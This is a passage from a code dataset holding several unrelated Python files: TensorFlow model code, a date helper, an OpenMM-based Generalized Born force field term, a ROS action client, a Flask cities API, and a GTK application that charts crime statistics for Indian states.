tf.nn.l2_normalize(outputs1, 1)\r\n outputs2 = tf.nn.l2_normalize(outputs2, 1)\r\n return outputs1, outputs2\r\n\r\n\"\"\"\r\n def build(self):\r\n self._build()\r\n\r\n # TF graph management\r\n self._loss()\r\n self._accuracy()\r\n self.loss = self.loss / tf.cast(self.batch_size, tf.float32)\r\n grads_and_vars = self.optimizer.compute_gradients(self.loss)\r\n clipped_grads_and_vars = [(tf.clip_by_value(grad, -5.0, 5.0) if grad is 
not None else None, var) \r\n for grad, var in grads_and_vars]\r\n self.grad, _ = clipped_grads_and_vars[0]\r\n self.opt_op = self.optimizer.apply_gradients(clipped_grads_and_vars)\r\n\r\n def _loss(self):\r\n for aggregator in self.aggregators:\r\n for var in aggregator.vars.values():\r\n self.loss += FLAGS.weight_decay * tf.nn.l2_loss(var)\r\n\r\n self.loss += self.link_pred_layer.loss(self.outputs1, self.outputs2, self.neg_outputs) \r\n tf.summary.scalar('loss', self.loss)\r\n\r\n def _accuracy(self):\r\n # shape: [batch_size]\r\n aff = self.link_pred_layer.affinity(self.outputs1, self.outputs2)\r\n # shape : [batch_size x num_neg_samples]\r\n\r\n _aff = tf.expand_dims(aff, axis=1)\r\n self.aff_all = tf.concat(axis=1, values=[self.neg_aff, _aff])\r\n size = tf.shape(self.aff_all)[1]\r\n _, indices_of_ranks = tf.nn.top_k(self.aff_all, k=size)\r\n _, self.ranks = tf.nn.top_k(-indices_of_ranks, k=size)\r\n self.mrr = tf.reduce_mean(tf.div(1.0, tf.cast(self.ranks[:, -1] + 1, tf.float32)))\r\n tf.summary.scalar('mrr', self.mrr)\r\n\r\n\"\"\"\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"298848082","text":"import datetime\n\ndef dayAdd(s,d):\n\tdate = datetime.datetime.strptime(s, \"%Y-%m-%d %H:%M:%S\")\n\tdate += datetime.timedelta(days=d)\n\treturn (date.strftime('%Y-%m-%d %H:%M:%S'))\n\ndef main():\n\ts = \"2017-10-06 13:19:37\"\n\tprint(s)\n\tprint(dayAdd(s,3))\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/dateadd.py","file_name":"dateadd.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"449173969","text":"# Onufriev-Bashford-Case Generalized Born term\n# can be added to any other force field\n\nfrom MMTK import ParticleScalar\nfrom MMTK.ForceFields.ForceField import ForceField\nfrom MMTK_OBC import OBCTerm\n\nclass OBCForceField(ForceField):\n\n \"\"\"\n Onufriev-Bashford-Case Generalized Born\n \"\"\"\n\n def __init__(self, prmtopFN,\n prmtop_atom_order, inv_prmtop_atom_order):\n \"\"\"\n @param prmtopFN: an AMBER parameter and topology file\n @type strength: C{str}\n \"\"\"\n # Initialize the ForceField class, giving a name to this one.\n ForceField.__init__(self, 'OBC')\n\n # Store arguments that recreate the force field from a pickled\n # universe or from a trajectory.\n self.arguments = (prmtopFN, prmtop_atom_order, inv_prmtop_atom_order)\n \n self.prmtopFN = prmtopFN\n self.prmtop_atom_order = prmtop_atom_order\n self.inv_prmtop_atom_order = inv_prmtop_atom_order\n\n # The following method is called by the energy evaluation engine\n # to inquire if this force field term has all the parameters it\n # requires. This is necessary for interdependent force field\n # terms. In our case, we just say \"yes\" immediately.\n def ready(self, global_data):\n return True\n\n # The following method is called by the energy evaluation engine\n # to obtain a list of the low-level evaluator objects (the C routines)\n # that handle the calculations.\n def evaluatorTerms(self, universe, subset1, subset2, global_data):\n # The energy for subsets is defined as consisting only\n # of interactions within that subset, so the contribution\n # of an external field is zero. 
Therefore we just return\n # an empty list of energy terms.\n if subset1 is not None or subset2 is not None:\n return []\n\n # Get charges, radii, and scale factors from OpenMM\n import simtk.openmm\n import simtk.openmm.app as OpenMM_app\n \n prmtop = OpenMM_app.AmberPrmtopFile(self.prmtopFN)\n OMM_system = prmtop.createSystem(\\\n \tnonbondedMethod=OpenMM_app.CutoffNonPeriodic, \\\n nonbondedCutoff=1.5, \\\n constraints=None, \\\n implicitSolvent=OpenMM_app.OBC2)\n f = OMM_system.getForces()[-2]\n\n import numpy as np\n numParticles = f.getNumParticles()\n charges = np.zeros(numParticles)\n atomicRadii = np.zeros(numParticles)\n scaleFactors = np.zeros(numParticles)\n for n in range(numParticles):\n (charge, radius, scaleFactor) = f.getParticleParameters(n)\n charges[n] = charge/simtk.unit.elementary_charge\n atomicRadii[n] = radius/simtk.unit.nanometer\n scaleFactors[n] = scaleFactor\n\n charges = charges[self.inv_prmtop_atom_order]\n atomicRadii = atomicRadii[self.inv_prmtop_atom_order]\n scaleFactors = scaleFactors[self.inv_prmtop_atom_order]\n\n# import time\n# import os.path\n# import MMTK_OBC\n# OBCpath = MMTK_OBC.__file__\n# print \"\"\"\n# in {0}\n# last modified {1}\n# \"\"\".format(OBCpath, time.ctime(os.path.getmtime(OBCpath)))\n\n # Here we pass all the parameters as \"simple\" data types to\n # the C code that handles energy calculations.\n return [OBCTerm(universe._spec, charges, atomicRadii, scaleFactors, 'OBC')]\n","sub_path":"AlGDock/ForceFields/OBC/OBC.py","file_name":"OBC.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"268910388","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\n\nfrom time import sleep\nimport random\nimport rospy\nimport actionlib\n\nfrom actionlib_msgs.msg import GoalStatus\nfrom geometry_msgs.msg import Vector3\nfrom bitbots_msgs.msg import DynUpGoal, DynUpAction, DynUpFeedback\nfrom visualization_msgs.msg import Marker\n\nshowing_feedback = False\n\nif __name__ == \"__main__\":\n print(\"[..] Initializing node\", end='')\n rospy.init_node('dynup_dummy_client', anonymous=True)\n print(\"\\r[OK] Initializing node\")\n\n\n def done_cb(state, result):\n print('Action completed: ', end='')\n if state == GoalStatus.PENDING:\n print('Pending')\n elif state == GoalStatus.ACTIVE:\n print('Active')\n elif state == GoalStatus.PREEMPTED:\n print('Preempted')\n elif state == GoalStatus.SUCCEEDED:\n print('Succeeded')\n elif state == GoalStatus.ABORTED:\n print('Aborted')\n elif state == GoalStatus.REJECTED:\n print('Rejected')\n elif state == GoalStatus.PREEMPTING:\n print('Preempting')\n elif state == GoalStatus.RECALLING:\n print('Recalling')\n elif state == GoalStatus.RECALLED:\n print('Recalled')\n elif state == GoalStatus.LOST:\n print('Lost')\n else:\n print('Unknown state', state)\n print(str(result))\n\n\n def active_cb():\n print(\"Server accepted action\")\n\n\n def feedback_cb(feedback):\n if len(sys.argv) > 1 and sys.argv[1] == '--feedback':\n print('Feedback')\n print(feedback)\n print()\n\n\n print('[..] 
Connecting to action server \\'dynup\\'', end='')\n sys.stdout.flush()\n client = actionlib.SimpleActionClient('dynup', DynUpAction)\n if not client.wait_for_server():\n exit(1)\n print('\\r[OK] Connecting to action server \\'dynup\\'')\n print()\n\n goal = DynUpGoal()\n goal.front = True\n\n client.send_goal(goal)\n client.done_cb = done_cb\n client.feedback_cb = feedback_cb\n client.active_cb = active_cb\n print(\"Sent new goal. Waiting for result\")\n client.wait_for_result()\n","sub_path":"bitbots_dynup/scripts/dummy_client.py","file_name":"dummy_client.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"412176232","text":"#!/usr/bin/python3\n\"\"\"\n View Cities\n\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import Flask, jsonify, abort, make_response, request\nfrom models.city import City\nfrom models import storage\nimport json\n\n\n@app_views.route('/states//cities', strict_slashes=False)\ndef cities(state_id):\n \"\"\"\n Return all cities of a state\n \"\"\"\n state = storage.get('State', state_id)\n if state is None:\n abort(404)\n cities = [city.to_dict() for city in state.cities]\n\n return jsonify(cities)\n\n\n@app_views.route('/cities/', strict_slashes=False)\ndef list_cities(city_id):\n \"\"\"\n Retrieves a city object\n \"\"\"\n city = storage.get('City', city_id)\n if city is None:\n abort(404)\n city = city.to_dict()\n\n return jsonify(city)\n\n\n@app_views.route('/cities/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_city(city_id):\n \"\"\"\n deletes a city object\n \"\"\"\n city = storage.get('City', city_id)\n if city is None:\n abort(404)\n\n storage.delete(city)\n storage.save()\n\n return make_response(jsonify({}), 200)\n\n\n@app_views.route('/states//cities', methods=['POST'],\n strict_slashes=False)\ndef post_city(state_id):\n \"\"\"\n post a city object\n \"\"\"\n if not request.json:\n abort(400, \"Not a JSON\")\n data = request.json\n if 'name' not in data.keys():\n abort(400, \"Missing name\")\n\n state = storage.get(\"State\", state_id)\n if state is None:\n abort(404)\n data['state_id'] = state_id\n instance = City(**data)\n storage.new(instance)\n storage.save()\n\n return make_response(jsonify(instance.to_dict()), 201)\n\n\n@app_views.route('/cities/', methods=['PUT'], strict_slashes=False)\ndef update_city(city_id):\n \"\"\"\n update a city object\n \"\"\"\n city = storage.get('City', city_id)\n if city is None:\n abort(404)\n\n if not request.json:\n abort(400, \"Not a JSON\")\n\n data = request.json\n for key, value in data.items():\n setattr(city, key, value)\n\n storage.save()\n\n return make_response(jsonify(city.to_dict()), 200)\n","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"427971696","text":"import gtk\nimport pandas as pd\nfrom pandas import Series as s\nfrom pandas import DataFrame as df\nimport numpy as np\nfrom matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas\nfrom matplotlib.backends.backend_gtkagg import NavigationToolbar2GTKAgg as NavigationToolbar\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\n\nclass PyApp(gtk.Window):\n\n\tdata = pd.read_csv(\"Crimes_commited_ipc2.csv\")\n\tcombobox_district = gtk.ComboBox()\t\n\tcombobox_year = gtk.ComboBox()\n\tcombobox_state = 
gtk.ComboBox()\n\tcombobox_crime = gtk.ComboBox()\n\tcombobox_state1 = gtk.ComboBox()\n\tcombobox_state2 = gtk.ComboBox()\n\tcombobox_yearc = gtk.ComboBox()\n\tbutton_show_graph = gtk.Button(\"Show Graph\")\n\tcompare_button = gtk.Button(\"Compare\")\n\tfiltered_data = df()\n\n\tstore_dist = gtk.ListStore(str)\n\n\tdef __init__(self):\n\t\tsuper(PyApp, self).__init__()\n\n\t\tself.set_title(\"Crimes in India\")\n\t\tself.set_size_request(700, 500)\n\t\t#self.set_icon_from_file(\"/home/safwan/Downloads/icon.png\")\n\n\t\t# Set window background image\n\t\tpixbuf = gtk.gdk.pixbuf_new_from_file(\"vector-grunge-texture-background.jpg\")\n\t\tpixmap, mask = pixbuf.render_pixmap_and_mask()\n\t\twidth, height = pixmap.get_size()\n\t\t#del pixbuf\n\t\tself.set_app_paintable(gtk.TRUE)\n\t\tself.resize(width, height)\n\t\tself.realize()\n\t\tself.window.set_back_pixmap(pixmap, gtk.FALSE)\n\t\t#del pixmap\n\n\t\tnb = gtk.Notebook()\n\t\tnb.set_tab_pos(gtk.POS_TOP)\n\t\tvbox = gtk.VBox(False, 5)\n\n\t\tvb = gtk.VBox()\n\t\thbox = gtk.HBox(True, 3)\n\t\thlabelsbox = gtk.HBox(True, 120)\n\t\thbuttonbox = gtk.HBox(True, 10)\n\n\t\t# Horizontal box for labels\n\t\tlabel_state = gtk.Label(\"State\")\n\t\tlabel_district = gtk.Label(\"District\")\n\t\tlabel_year = gtk.Label(\"Year\")\n\t\tlabel_crime = gtk.Label(\"Crime\")\n\n\t\thlabelsbox.pack_start(label_state, True, True, 10)\n\t\thlabelsbox.pack_start(label_district, True, True, 10)\n\t\thlabelsbox.pack_start(label_year, True, True, 10)\n\t\thlabelsbox.pack_start(label_crime, True, True, 10)\n\n\t\tvalign = gtk.Alignment(0.25, 0.10, 0, 0)\n\t\tvalign1 = gtk.Alignment(0, 1, 0, 0)\n\t\tvalign2 = gtk.Alignment(0, 0, 1, 0)\n\t\t\n\t\tstore = gtk.ListStore(str)\n\t\tcell = gtk.CellRendererText()\n\t\tself.combobox_state.pack_start(cell)\n\t\tself.combobox_state.set_title(\"States\")\n\t\tself.combobox_state.add_attribute(cell, 'text', 0)\n\n\t\thbox.pack_start(self.combobox_state, True, True, 10)\n\n\t\tstore.append ([\"ANDHRA PRADESH\"])\n\t\tstore.append ([\"ARUNACHAL PRADESH\"])\n\t\tstore.append ([\"ASSAM\"])\n\t\tstore.append ([\"BIHAR\"])\n\t\tstore.append ([\"GOA\"])\n\t\tstore.append ([\"GUJARAT\"])\n\t\tstore.append ([\"HARYANA\"])\n\t\tstore.append ([\"HIMACHAL PRADESH\"])\n\t\tstore.append ([\"JAMMU & KASHMIR\"])\n\t\tstore.append ([\"JHARKHAND\"])\n\t\tstore.append ([\"KARNATAKA\"])\n\t\tstore.append ([\"KERALA\"])\n\t\tstore.append ([\"MADHYA PRADESH\"])\n\t\tstore.append ([\"MAHARASHTRA\"])\n\t\tstore.append ([\"MANIPUR\"])\n\t\tstore.append ([\"MEGHALAYA\"])\n\t\tstore.append ([\"MIZORAM\"])\n\t\tstore.append ([\"NAGALAND\"])\n\t\tstore.append ([\"ODISHA\"])\n\t\tstore.append ([\"MIZORAM\"])\n\t\tstore.append ([\"PUNJAB\"])\n\t\tstore.append ([\"RAJASTHAN\"])\n\t\tstore.append ([\"TAMIL NADU\"])\n\t\tstore.append ([\"TRIPURA\"])\n\t\tstore.append ([\"UTTAR PRADESH\"])\n\t\tstore.append ([\"UTTARAKHAND\"])\n\t\tstore.append ([\"WEST BENGAL\"])\n\t\tstore.append ([\"A & N ISLANDS\"])\n\t\tstore.append ([\"CHANDIGARH\"])\n\t\tstore.append ([\"D & N HAVELI\"])\n\t\tstore.append ([\"DAMAN & DIU\"])\n\t\tstore.append ([\"DELHI UT\"])\n\t\tstore.append ([\"LAKSHADWEEP\"])\n\t\tstore.append ([\"PUDUCHERRY\"])\n\t\t\n\t\tself.combobox_state.set_model(store)\n\t\tself.combobox_state.connect('changed', self.on_changed)\n\t\tself.combobox_state.set_active(0)\n\n\t\tself.store_dist = gtk.ListStore(str)\n\t\tcell_dist = gtk.CellRendererText()\n\t\tself.combobox_district.pack_start(cell_dist)\n\t\tself.combobox_district.add_attribute(cell_dist, 'text', 
0)\n\t\tself.combobox_district.connect('changed', self.on_changed_district)\n\t\thbox.pack_start(self.combobox_district, True, True, 10)\n\n\t\t\n\t\t#Year dropbox\n\t\t\n\t\tstore_year = gtk.ListStore(str)\n\t\tcell_year = gtk.CellRendererText()\n\t\tself.combobox_year.pack_start(cell_year)\n\t\tself.combobox_year.add_attribute(cell_year, 'text', 0)\n\n\t\thbox.pack_start(self.combobox_year, True, True, 10)\n\n\t\tdistrict = self.data[(self.data['STATEorUT']=='ANDHRA PRADESH') | (self.data['STATEorUT']=='Andhra Pradesh')].filter(items=['STATE/UT','DISTRICT','YEAR'])\n\t\tyear=s(district['YEAR']).unique().tolist()\n\t\tstore_year.append([\"All\"])\n\t\tfor i in year:\n\t\t\tstore_year.append([i])\n\t\t\n\t\tself.combobox_year.set_model(store_year)\n\t\t#combobox.connect('changed', self.on_changed)\n\t\tself.combobox_year.set_active(0)\n\t\tself.combobox_year.connect('changed', self.on_changed_year)\n\n\t\t# Crime dropbox\n\t\t\n\t\tstore_crime = gtk.ListStore(str)\n\t\tcell_crime = gtk.CellRendererText()\n\t\tself.combobox_crime.pack_start(cell_crime)\n\t\tself.combobox_crime.add_attribute(cell_crime, 'text', 0)\n\t\tself.combobox_crime.connect('changed', self.on_changed_crime)\n\n\t\thbox.pack_start(self.combobox_crime, True, True, 10)\n\n\t\tstore_crime.append ([\"MURDER\"])\n\t\tstore_crime.append ([\"RAPE\"])\n\t\tstore_crime.append ([\"KIDNAPPING\"])\n\t\tstore_crime.append ([\"RIOTS\"])\n\t\tstore_crime.append ([\"ROBBERY\"])\n\t\tstore_crime.append ([\"BURGLARY\"])\n\t\tstore_crime.append ([\"DOWRY DEATHS\"])\n\t\tstore_crime.append ([\"TOTAL IPC CRIMES\"])\n\t\tself.combobox_crime.set_model(store_crime)\n\t\t#combobox.connect('changed', self.on_changed)\n\t\tself.combobox_crime.set_active(0)\t\t\n\n\t\tvalign.add(hbox)\n\t\tvalign1.add(hlabelsbox)\n\t\t\n\t\tbutton_disp_data = gtk.Button(\"Display Data\")\n\n\t\tbutton_disp_data.connect(\"clicked\", self.display_data)\n\t\tself.button_show_graph.connect(\"clicked\", self.display_graph)\n\n\t\tself.button_show_graph.set_sensitive(False)\n\n\t\thbuttonbox.pack_start(button_disp_data, True, True, 10)\n\t\thbuttonbox.pack_start(self.button_show_graph, True, True, 10)\n\t\tvalign2.add(hbuttonbox)\n\t\tvbox.pack_start(valign1)\n\t\tvbox.pack_start(valign)\n\t\tvbox.pack_start(valign2)\n\t\t\n\t\tnb.append_page(vbox)\n\t\tnb.set_tab_label_text(vbox, \"District wise crimes\")\n\n\t\t# Code for 2nd TAB\n\n\t\tstate1lbl = gtk.Label(\"State 1\")\n\t\tstate2lbl = gtk.Label(\"State 2\")\n\t\t\n\t\t\n\t\t\n\t\tself.compare_button.connect(\"clicked\", self.compare_states)\n\t\tself.compare_button.set_sensitive(False)\n\n\t\ttable = gtk.Table(8,4,True)\n\t\ttable.set_col_spacings(7)\n\n\t\tstates = [\"ANDHRA PRADESH\", \"ARUNACHAL PRADESH\", \"ASSAM\", \"BIHAR\",\"CHHATTISGARH\", \"GOA\",\"GUJARAT\",\"HARYANA\",\"HIMACHAL PRADESH\", \"JAMMU & KASHMIR\", \"JHARKHAND\", \"KARNATAKA\", \"KERALA\", \"MADHYA PRADESH\", \"MAHARASHTRA\", \"MANIPUR\", \"MEGHALAYA\", \"MIZORAM\", \"NAGALAND\", \"ODISHA\", \"PUNJAB\", \"RAJASTHAN\", \"SIKKIM\", \"TAMIL NADU\", \"TRIPURA\", \"UTTAR PRADESH\", \"UTTARAKHAND\", \"WEST BENGAL\",\"A & N ISLANDS\", \"CHANDIGARH\", \"D & N HAVELI\", \"DAMAN & DIU\", \"DELHI UT\", \"LAKSHADWEEP\", \"PUDUCHERRY\"]\n\t\tstorestate1 = gtk.ListStore(str)\n\t\tcellstate1 = gtk.CellRendererText()\n\t\tself.combobox_state1.pack_start(cellstate1)\n\t\tself.combobox_state1.add_attribute(cellstate1, 'text', 0)\n\t\tself.combobox_state1.set_active(0)\n\t\tfor i in 
states:\n\t\t\tstorestate1.append([i])\n\t\tself.combobox_state1.set_model(storestate1)\n\t\t\n\n\t\tstorestate2 = gtk.ListStore(str)\n\t\tcellstate2 = gtk.CellRendererText()\n\t\tself.combobox_state2.pack_start(cellstate2)\n\t\tself.combobox_state2.add_attribute(cellstate2, 'text', 0)\n\t\tself.combobox_state2.set_active(0)\n\t\tfor i in states:\n\t\t\tstorestate2.append([i])\n\t\tself.combobox_state2.set_model(storestate2)\n\n\t\tstore_yearc = gtk.ListStore(str)\n\t\tcell_yearc = gtk.CellRendererText()\t\t\n\t\tself.combobox_yearc.pack_start(cell_yearc)\n\t\tself.combobox_yearc.add_attribute(cell_yearc, 'text', 0)\n\t\tself.combobox_yearc.set_active(0)\n\n\t\tfor i in year:\n\t\t\tstore_yearc.append([i])\n\t\tself.combobox_yearc.set_model(store_yearc)\n\n\t\tself.combobox_state1.connect('changed', self.on_changed_state1)\n\t\tself.combobox_state2.connect('changed', self.on_changed_state2)\n\t\tself.combobox_yearc.connect('changed', self.on_changed_yearc)\n\n\n\t\ttable.attach(state1lbl, 0, 1, 3, 4)\n\t\ttable.attach(state2lbl, 2, 3, 3, 4)\n\t\ttable.attach(self.combobox_state1, 0, 1, 4, 5,xpadding = 8, ypadding=9)\n\t\ttable.attach(self.combobox_state2, 2, 3, 4, 5,xpadding = 8, ypadding=9)\n\t\ttable.attach(self.combobox_yearc, 1, 2, 4, 5,xpadding = 8, ypadding=9)\n\t\ttable.attach(self.compare_button, 1, 2, 6, 7, xpadding = 8, ypadding=9)\n\t\t\n\t\tnb.append_page(table)\n\t\tnb.set_tab_label_text(table, \"Comparison of states\")\n\n\t\ttv = gtk.TextView()\n\t\tnb.append_page(tv)\n\t\tnb.set_tab_label_text(tv, \"About\")\n\t\t\n\t\tself.add(nb)\n\t\t\n\t\tself.connect(\"destroy\", gtk.main_quit)\t\t\n\t\tself.show_all()\n\n\tdef on_changed_state1(self, widget):\n\t\tif(widget.get_active_text() == self.combobox_state2.get_active_text()):\n\t\t\tself.compare_button.set_sensitive(False)\n\t\telse:\n\t\t\tself.compare_button.set_sensitive(True)\n\t\treturn\n\n\tdef on_changed_state2(self, widget):\n\t\tif(widget.get_active_text() == self.combobox_state1.get_active_text()):\n\t\t\tself.compare_button.set_sensitive(False)\n\t\telse:\n\t\t\tself.compare_button.set_sensitive(True)\n\t\treturn\n\n\tdef on_changed_yearc(self, widget):\n\t\treturn\n\n\tdef on_changed(self, widget):\n\t\t#data = pd.read_csv(\"/home/safwan/crime-in-india/crime/01_District_wise_crimes_committed_IPC_2013.csv\"\t\n\t\tdistrict = s(self.data[self.data['STATEorUT']==widget.get_active_text()].filter(items=['DISTRICT'])['DISTRICT']).unique().tolist()\n\t\tself.store_dist.clear()\n\t\tself.store_dist.append([\"All\"])\n\t\tfor i in district:\n\t\t\tself.store_dist.append([i])\n\n\t\tself.combobox_district.set_model(self.store_dist)\n\t\t#combobox.connect('changed', self.on_changed)\n\t\tself.combobox_district.set_active(0)\n\n\n\tdef display_data(self, widget):\n\t\t#print self.combobox_state.get_active_text(), self.combobox_year.get_active_text(), self.combobox_district.get_active_text(), self.combobox_crime.get_active_text()\n\t\t#filtered_data = self.data[((self.data['STATE.UT']==self.combobox_state.get_active_text()) & (self.data['DISTRICT']==self.combobox_district.get_active_text()) & (self.data['YEAR']==self.combobox_year.get_active_text()))].filter(items=['STATE/UT','DISTRICT','YEAR', self.combobox_crime.get_active_text()])\n\n\t\tdialog = gtk.Dialog(\"My dialog\",\n\t\tself,\n\t\tgtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,\n\t\t(gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))\n\t\tdialog.set_size_request(400,700)\n\t\t\n\t\tliststore = gtk.ListStore(str, str, str, str)\n\n\t\ttreeview = 
gtk.TreeView(liststore)\n\n\t\ttvcolumn = gtk.TreeViewColumn(\"STATE/UT\")\n\t\ttvcolumn1 = gtk.TreeViewColumn(\"DISTRICT\")\n\t\ttvcolumn2 = gtk.TreeViewColumn(\"YEAR\")\n\t\ttvcolumn3 = gtk.TreeViewColumn(self.combobox_crime.get_active_text())\n\t\t\n\t\tfor i in self.filtered_data.values.tolist():\n\t\t\tliststore.append(i)\t\n\t\t#liststore.append(['Open', gtk.STOCK_OPEN, 'Open a File', True])\n\t\n\t\ttreeview.append_column(tvcolumn)\n\t\ttreeview.append_column(tvcolumn1)\n\t\ttreeview.append_column(tvcolumn2)\n\t\ttreeview.append_column(tvcolumn3)\n\n\t\tcell = gtk.CellRendererText()\n\t\tcell1 = gtk.CellRendererText()\n\t\tcell2 = gtk.CellRendererText()\n\t\tcell3 = gtk.CellRendererText()\n\t\t\n\t\tcell.set_property('cell-background', 'yellow')\n\t\tcell1.set_property('cell-background', 'cyan')\n\t\tcell2.set_property('cell-background', 'pink')\n\t\tcell3.set_property('cell-background', 'red')\n\n\t\ttvcolumn.pack_start(cell, False)\n\t\ttvcolumn1.pack_start(cell1, True)\n\t\ttvcolumn2.pack_start(cell2, True)\n\t\ttvcolumn3.pack_start(cell3, True)\n\n\t\ttvcolumn.set_attributes(cell, text = 0)\n\t\ttvcolumn1.set_attributes(cell1, text = 1)\n\t\ttvcolumn2.set_attributes(cell2, text = 2)\n\t\ttvcolumn3.set_attributes(cell3, text = 3)\n\n\t\tscrolled_window = gtk.ScrolledWindow()\n\t\tscrolled_window.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n\t\tscrolled_window.add(treeview)\n\t\tscrolled_window.set_border_width(10)\n\t\t#scrolled_window.set_min_content_height(200)\n\n\t\tscrolled_window.add(treeview)\n\n\t\t\n\t\ttreeview.set_search_column(0)\n\t\tdialog.vbox.add(scrolled_window)\n\t\ttreeview.show()\n\t\tscrolled_window.show()\n\t\tres = dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\treturn\n\n\tdef display_graph(self, widget):\n\t\tdialog = gtk.Dialog(\"My dialog\",\n\t\tself,\n\t\tgtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,\n\t\t(gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))\n\t\tdialog.set_size_request(1300,500)\n\n\t\t# Crime name filter\n\t\tif \" \" not in self.combobox_crime.get_active_text():\n\t\t\tcrime = self.combobox_crime.get_active_text()\n\t\telse:\n\t\t\tcrime = \".\".join(self.combobox_crime.get_active_text().split(\" \"))\n\n\t\t\n\n\t\tfig = Figure(figsize=(12, 10), dpi=100)\n\n\t\tsales = [{'Groups':'0-9', 'Counts':38},\n\t\t\t\t{'Groups':'10-19', 'Counts':41},\n\t\t\t\t{'Groups':'20-29', 'Counts':77},\n\t\t\t\t{'Groups':'30-39', 'Counts':73},\n\t\t\t\t{'Groups':'40-49', 'Counts':77}]\n\t\tdf = pd.DataFrame(sales)\n\n\t\tax = fig.add_subplot(111)\n\n\t\tif (self.combobox_year.get_active_text() == \"All\" and self.combobox_district.get_active_text() != \"All\"):\n\t\t\t\n\t\t\tself.filtered_data = self.filtered_data.reset_index(drop=True)\n\t\t\typos = np.arange(len(self.filtered_data['YEAR'].tolist()))\n\t\t\tp1 = ax.bar(ypos, self.filtered_data[crime], width=0.6, color='r')\n\n\t\t\tax.set_title(crime.lower() +'s in ' + self.combobox_district.get_active_text() +' - Yearwise')\n\t\t\tax.set_xticks(ypos+0.3)\n\t\t\tax.set_xticklabels(self.filtered_data.YEAR)\n\t\telif (self.combobox_district.get_active_text() == \"All\" and self.combobox_year.get_active_text() != \"All\"):\n\t\t\tfd_total_removed = self.filtered_data[self.filtered_data.DISTRICT != 'TOTAL']\n\t\t\typos = np.arange(len(fd_total_removed['DISTRICT'].tolist()))\n\t\t\t\n\t\t\tp1 = ax.bar(ypos, fd_total_removed[crime], width=0.3, color='r')\n\t\t\tfontx = {'fontsize': 7,\n \t\t\t\t\t'fontweight': 2,\n \t\t\t\t\t'verticalalignment': 'center',\n \t\t\t\t\t'horizontalalignment': 
'center'}\n\n\t\t\tax.set_title(crime + 's in ' + self.combobox_state.get_active_text() + '(' +self.combobox_state.get_active_text()+' )' + ' - Districtwise')\n\t\t\tax.set_xticks(ypos+0.15)\n\t\t\tax.set_xticklabels(fd_total_removed.DISTRICT, fontdict=fontx)\n\t\telse:\n\t\t\tprint(df.index)\n\t\t\tp1 = ax.bar(df.index, df.Counts, width=0.8, color='r')\n\n\n\t\t\tax.set_title('Scores by group and gender')\n\t\t\tax.set_xticks(df.index+0.4)\n\t\t\tax.set_xticklabels(df.Groups)\n\n\t\tcanvas = FigureCanvas(fig) # a gtk.DrawingArea\n\t\tcanvas.set_size_request(800, 600)\n\t\tdialog.vbox.pack_start(canvas)\n\t\ttoolbar = NavigationToolbar(canvas, dialog)\n\t\tdialog.vbox.pack_start(toolbar, False, False)\n\t\tcanvas.show()\n\t\tdialog.run()\n\t\tdialog.destroy()\n\t\treturn\n\n\tdef on_changed_district(self, widget):\n\t\tif(self.combobox_year.get_active_text() != 'All'):\t\t\n\t\t\tintyear = int(self.combobox_year.get_active_text())\n\n\t\t# Check crime field\n\t\tif \" \" not in self.combobox_crime.get_active_text():\n\t\t\tcrime = self.combobox_crime.get_active_text()\n\t\telse:\n\t\t\tcrime = \".\".join(self.combobox_crime.get_active_text().split(\" \"))\n\n\t\tif(self.combobox_district.get_active_text() == 'All' and self.combobox_year.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(False)\n\t\telif(self.combobox_district.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(True)\n\t\telif (self.combobox_year.get_active_text() == \"All\"):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(True)\t\n\t\telse:\n\t\t\tself.button_show_graph.set_sensitive(False)\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\t\t\n\t\treturn\n\n\tdef on_changed_year(self, widget):\n\t\tif(self.combobox_year.get_active_text() != 'All'):\t\t\n\t\t\tintyear = int(self.combobox_year.get_active_text())\n\n\t\t# Check crime field\n\t\tif \" \" not in self.combobox_crime.get_active_text():\n\t\t\tcrime = self.combobox_crime.get_active_text()\n\t\telse:\n\t\t\tcrime = \".\".join(self.combobox_crime.get_active_text().split(\" \"))\n\n\t\tif(self.combobox_district.get_active_text() == 'All' and self.combobox_year.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == 